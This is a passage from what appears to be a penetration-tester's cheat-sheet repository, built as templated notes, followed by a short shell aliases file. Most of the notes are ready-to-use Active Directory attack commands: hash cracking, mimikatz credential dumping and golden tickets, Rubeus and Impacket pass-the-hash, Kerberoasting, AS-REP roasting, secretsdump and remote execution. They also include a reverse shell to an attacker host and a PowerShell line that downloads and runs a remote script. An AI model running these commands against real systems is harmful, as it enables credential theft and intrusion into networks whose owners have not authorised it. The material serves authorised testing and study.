ssh.hash ssh.passwords -r ssh.rule --force 508 | hashcat -m 22921 ssh.hash /usr/share/wordlists/rockyou.txt 509 | 510 | #ntlm 511 | hashcat --help | grep -i "ntlm" 512 | hashcat -m 1000 hashes.dcsync /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force 513 | 514 | #ntlmv2 515 | hashcat --help | grep -i "ntlm" 516 | hashcat -m 5600 paul.hash /usr/share/wordlists/rockyou.txt --force 517 | 518 | ``` 519 | 520 | 521 | 522 | 523 | ## Mimikatz & bloodhound & Rubeus 524 | ```powershell 525 | https://gist.github.com/insi2304/484a4e92941b437bad961fcacda82d49 526 | 527 | # mimikatz 528 | privilege::debug 529 | token::elevate 530 | lsadump::sam 531 | lsadump::lsa 532 | lsadump::secrets 533 | sekurlsa::logonpasswords 534 | lsadump::cache 535 | 536 | .\mimikatz "privilege::debug" "token::elevate"  "lsadump::sam " exit 537 | sekurlsa::minidump /users/admin/Desktop/lsass.DMP 538 | sekurlsa::LogonPasswords 539 | 540 | Generate TGT with NTLM 541 | kerberos::golden /domain:<% tp.frontmatter["DOMAIN"] %>/sid: /rc4: /user:<% tp.frontmatter["USERNAME"] %> 542 | 543 | Inject TGT with Mimikatz 544 | kerberos::ptt 545 | 546 | # bloodhound 547 | 
bloodhound-python -d <% tp.frontmatter["DOMAIN"] %> -u <% tp.frontmatter["USERNAME"] %> -p "<% tp.frontmatter["PASSWORD"] %>" -gc <% tp.frontmatter["DOMAIN"] %> -c all -ns <% tp.frontmatter["RHOST"] %> 548 | bloodhound-python -u <% tp.frontmatter["USERNAME"] %> -p '<% tp.frontmatter["PASSWORD"] %>' -d <% tp.frontmatter["DOMAIN"] %> -ns <% tp.frontmatter["RHOST"] %> -c All 549 | bloodhound-python -u <% tp.frontmatter["USERNAME"] %> -p '<% tp.frontmatter["PASSWORD"] %>' -d <% tp.frontmatter["DOMAIN"] %> -dc <% tp.frontmatter["RHOST"] %> -ns <% tp.frontmatter["RHOST"] %> --dns-tcp -no-pass -c ALL --zip 550 | 551 | 552 | # Rubeus 553 | 554 | Overpass the hash 555 | Rubeus.exe kerberoast /user:<% tp.frontmatter["USERNAME"] %> 556 | 557 | Pass the hash 558 | .\Rubeus.exe asktgt /user:Administrator /certificate:7F052EB0D5D122CEF162FAE8233D6A0ED73ADA2E /getcredentials 559 | 560 | RunasCs 561 | ./RunasCs.exe -l 3 -d <% tp.frontmatter["DOMAIN"] %> "<% tp.frontmatter["USERNAME"] %>" '<% tp.frontmatter["PASSWORD"] %>' 'C:\Users\<% tp.frontmatter["USERNAME"] %>\Downloads\.exe' 562 | ./RunasCs.exe -d <% tp.frontmatter["DOMAIN"] %> "<% tp.frontmatter["USERNAME"] %>" '<% tp.frontmatter["PASSWORD"] %>' cmd.exe -r <% tp.frontmatter["LHOST"] %>: 563 | 564 | winexe 565 | winexe -U '<% tp.frontmatter["USERNAME"] %>%<% tp.frontmatter["PASSWORD"] %>' //<% tp.frontmatter["RHOST"] %> cmd.exe 566 | winexe -U '<% tp.frontmatter["USERNAME"] %>%<% tp.frontmatter["PASSWORD"] %>' --system //<% tp.frontmatter["RHOST"] %> cmd.exe 567 | ``` 568 | 569 | 570 | 571 | 572 | 573 | 574 | # Impacket 575 | ```bash 576 | impacket-mssqlclient <% tp.frontmatter["USERNAME"] %>:<% tp.frontmatter["PASSWORD"] %>@<% tp.frontmatter["RHOST"] %> -windows-auth 577 | 578 | psexec.py <% tp.frontmatter["DOMAIN"] %>/<% tp.frontmatter["USERNAME"] %>:'<% tp.frontmatter["PASSWORD"] %>'@<% tp.frontmatter["RHOST"] %> 579 | psexec.py -hashes  ntlm:ntlm <% tp.frontmatter["USERNAME"] %>@<% tp.frontmatter["RHOST"] %> 580 | 581 | 
582 | wmiexec.py <% tp.frontmatter["DOMAIN"] %>/<% tp.frontmatter["USERNAME"] %>:'<% tp.frontmatter["PASSWORD"] %>'@<% tp.frontmatter["RHOST"] %> 583 | wmiexec.py -hashes  ntlm:ntlm <% tp.frontmatter["USERNAME"] %>@<% tp.frontmatter["RHOST"] %> 584 | 585 | 586 | impacket-getTGT <% tp.frontmatter["RHOST"] %>/<% tp.frontmatter["USERNAME"] %>:<% tp.frontmatter["PASSWORD"] %> 587 | impacket-getTGT <% tp.frontmatter["RHOST"] %>/<% tp.frontmatter["USERNAME"] %> -dc-ip <% tp.frontmatter["RHOST"] %> -hashes aad3b435b51404eeaad3b435b51404ee:7c662956a4a0486a80fbb2403c5a9c2c 588 | 589 | impacket-GetNPUsers <% tp.frontmatter["RHOST"] %>/ -usersfile usernames.txt -format hashcat -outputfile hashes.asreproast 590 | impacket-GetNPUsers <% tp.frontmatter["RHOST"] %>/<% tp.frontmatter["USERNAME"] %> -request -no-pass -dc-ip <% tp.frontmatter["RHOST"] %> 591 | impacket-GetNPUsers <% tp.frontmatter["RHOST"] %>/ -usersfile usernames.txt -format <% tp.frontmatter["USERNAME"] %> -outputfile hashes 592 | 593 | 594 | export KRB5CCNAME=<% tp.frontmatter["USERNAME"] %>.ccache 595 | impacket-GetUserSPNs <% tp.frontmatter["RHOST"] %>/<% tp.frontmatter["USERNAME"] %>:<% tp.frontmatter["PASSWORD"] %> -k -dc-ip <% tp.frontmatter["RHOST"] %>.<% tp.frontmatter["RHOST"] %> -no-pass -request 596 | 597 | export KRB5CCNAME=<% tp.frontmatter["USERNAME"] %>.ccache 598 | impacket-secretsdump <% tp.frontmatter["RHOST"] %>/<% tp.frontmatter["USERNAME"] %>@<% tp.frontmatter["RHOST"] %> 599 | impacket-secretsdump -k <% tp.frontmatter["RHOST"] %>/<% tp.frontmatter["USERNAME"] %>@<% tp.frontmatter["RHOST"] %>.<% tp.frontmatter["RHOST"] %> -no-pass -debug 600 | impacket-secretsdump -ntds ndts.dit -system system -hashes lmhash:nthash LOCAL -output nt-hash 601 | impacket-secretsdump -dc-ip <% tp.frontmatter["RHOST"] %> <% tp.frontmatter["RHOST"] %>.LOCAL/svc_bes:<% tp.frontmatter["PASSWORD"] %>@<% tp.frontmatter["RHOST"] %> 602 | impacket-secretsdump -sam SAM -security SECURITY -system SYSTEM LOCAL 603 | 604 | 
605 | ``` 606 | 607 | 608 | # Attacks 609 | 610 | #### Bruteforce 611 | ``` 612 | ./kerbrute -domain <% tp.frontmatter["DOMAIN"] %> -users -passwords -outputfile 613 | .\Rubeus.exe brute /users: /passwords: /domain:<% tp.frontmatter["DOMAIN"] %> /outfile: 614 | .\Rubeus.exe brute /passwords: /outfile: 615 | 616 | ``` 617 | 618 | 619 | #### AsRepRoast 620 | ```bash 621 | # Domain users ( Creds required) 622 | impacket-GetNPUsers <% tp.frontmatter["DOMAIN"] %>/<% tp.frontmatter["USERNAME"] %>:<% tp.frontmatter["PASSWORD"] %> -request -format hashcat -outputfile 623 | impacket-GetNPUsers <% tp.frontmatter["DOMAIN"] %>/<% tp.frontmatter["USERNAME"] %>:<% tp.frontmatter["PASSWORD"] %> -request -format <% tp.frontmatter["USERNAME"] %> -outputfile 624 | 625 | # List of users (No Creds) 626 | impacket-GetNPUsers <% tp.frontmatter["DOMAIN"] %>/ -usersfile -format hashcat -outputfile 627 | impacket-GetNPUsers <% tp.frontmatter["DOMAIN"] %>/ -usersfile -format <% tp.frontmatter["USERNAME"] %> -outputfile 628 | 629 | 630 | .\Rubeus.exe asreproast /format:hashcat /outfile: 631 | 632 | ``` 633 | 634 | #### Kerberoasting 635 | ```powershell 636 | impacket-GetUserSPNs <% tp.frontmatter["DOMAIN"] %>/<% tp.frontmatter["USERNAME"] %>:<% tp.frontmatter["PASSWORD"] %> -outputfile 637 | 638 | .\Rubeus.exe kerberoast /outfile: 639 | 640 | iex (new-object Net.WebClient).DownloadString("https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1") 641 | 642 | Invoke-Kerberoast -OutputFormat hashcat | % { $_.Hash } | Out-File -Encoding ASCII 643 | Invoke-Kerberoast -OutputFormat <% tp.frontmatter["USERNAME"] %> | % { $_.Hash } | Out-File -Encoding ASCII 644 | ``` 645 | 646 | 647 | #### OverPassTheHash / PassTheKey 648 | ```bash 649 | 650 | # Request-TGT 651 | impacket-getTGT <% tp.frontmatter["DOMAIN"] %>/<% tp.frontmatter["USERNAME"] %> -hashes : 652 | 653 | # Req-TGT with password 654 | impacket-getTGT <% tp.frontmatter["DOMAIN"] 
%>/<% tp.frontmatter["USERNAME"] %>:<% tp.frontmatter["PASSWORD"] %> 655 | 656 | # Ask and inject TGT 657 | .\Rubeus.exe asktgt /domain:<% tp.frontmatter["DOMAIN"] %> /user:<% tp.frontmatter["USERNAME"] %> /rc4: /ptt 658 | 659 | .\PsExec.exe -accepteula \\<% tp.frontmatter["RHOST"] %> cmd 660 | ``` 661 | 662 | #### Execute commands remotely 663 | 664 | ``` 665 | impacket-psexec <% tp.frontmatter["DOMAIN"] %>/<% tp.frontmatter["USERNAME"] %>@<% tp.frontmatter["RHOST"] %> -k -no-pass 666 | impacket-smbexec <% tp.frontmatter["DOMAIN"] %>/<% tp.frontmatter["USERNAME"] %>@<% tp.frontmatter["RHOST"] %> -k -no-pass 667 | impacket-wmiexec <% tp.frontmatter["DOMAIN"] %>/<% tp.frontmatter["USERNAME"] %>@<% tp.frontmatter["RHOST"] %> -k -no-pass 668 | 669 | 670 | ``` 671 | 672 | 673 | 674 | ### Web 675 | ```bash 676 | 677 | # webdav 678 | davtest [-auth <% tp.frontmatter["USERNAME"] %>:<% tp.frontmatter["PASSWORD"] %>] -move -sendbd auto -url http://<% tp.frontmatter["RHOST"] %> #Upload .txt files and try to move them to other extensions 679 | davtest [-auth <% tp.frontmatter["USERNAME"] %>:<% tp.frontmatter["PASSWORD"] %>] -sendbd auto -url http://<% tp.frontmatter["RHOST"] %> #Try to upload every extension 680 | 681 | cadaver <% tp.frontmatter["RHOST"] %> 682 | 683 | 684 | Autorecon 685 | 686 | autorecon <% tp.frontmatter["RHOST"] %> --exclude-tags="dirbuster,top-100-udp-ports,enum4linux,top-tcp-ports" 687 | autorecon <% tp.frontmatter["RHOST"] %> --exclude-tags="dirbuster,top-100-udp-ports,enum4linux,top-tcp-ports" --dirbuster.tool ffuf 688 | autorecon <% tp.frontmatter["RHOST"] %> --exclude-tags="dirbuster,top-100-udp-ports,enum4linux,top-tcp-ports" --dirbuster.tool ffuf -vv 689 | # to skip the all-ports scan when you already have the port list
690 | autorecon <% tp.frontmatter["RHOST"] %> --exclude-tags="dirbuster,top-100-udp-ports,enum4linux,top-tcp-ports,all-tcp-ports" --dirbuster.tool ffuf -vv 691 | ``` 692 | -------------------------------------------------------------------------------- /aliases.md: -------------------------------------------------------------------------------- 1 | ```bash 2 | alias gopwk="cd /mnt/hgfs/oscp" 3 | alias godesk='cd /home/username/Desktop' 4 | alias godown="cd /home/username/Downloads" 5 | alias gohome="cd /home/username/" 6 | alias gops="python -m http.server" # with Python 3 this serves the current directory on all interfaces (port 8000 by default); run it from a dedicated directory, or restrict it with --bind / --directory 7 | alias gorep="cd /home/username/Repositories" 8 | alias goip="ip -c a | awk '/\/ {sub(/\/.*/, \"\", \$2); gsub(/\x1B\[[0-9;]*[JKmsu]/, \"\", \$2); gsub(/[[:cnt> 9 | alias goims="impacket-smbserver test /home/username -smb2support -user joe -password joe" # shares the whole of /home/username under the fixed login joe/joe; point the share at a dedicated transfer directory instead 10 | alias ..="cd .." 11 | alias c="clear" 12 | alias ...="cd ../.." 13 | alias ....="cd ../../.." 14 | alias .....="cd ../../../.." 15 | alias ctc='xclip -sel clip' # copy to clipboard 16 | alias gotools="cd /home/username/Tools" 17 | ``` 18 | --------------------------------------------------------------------------------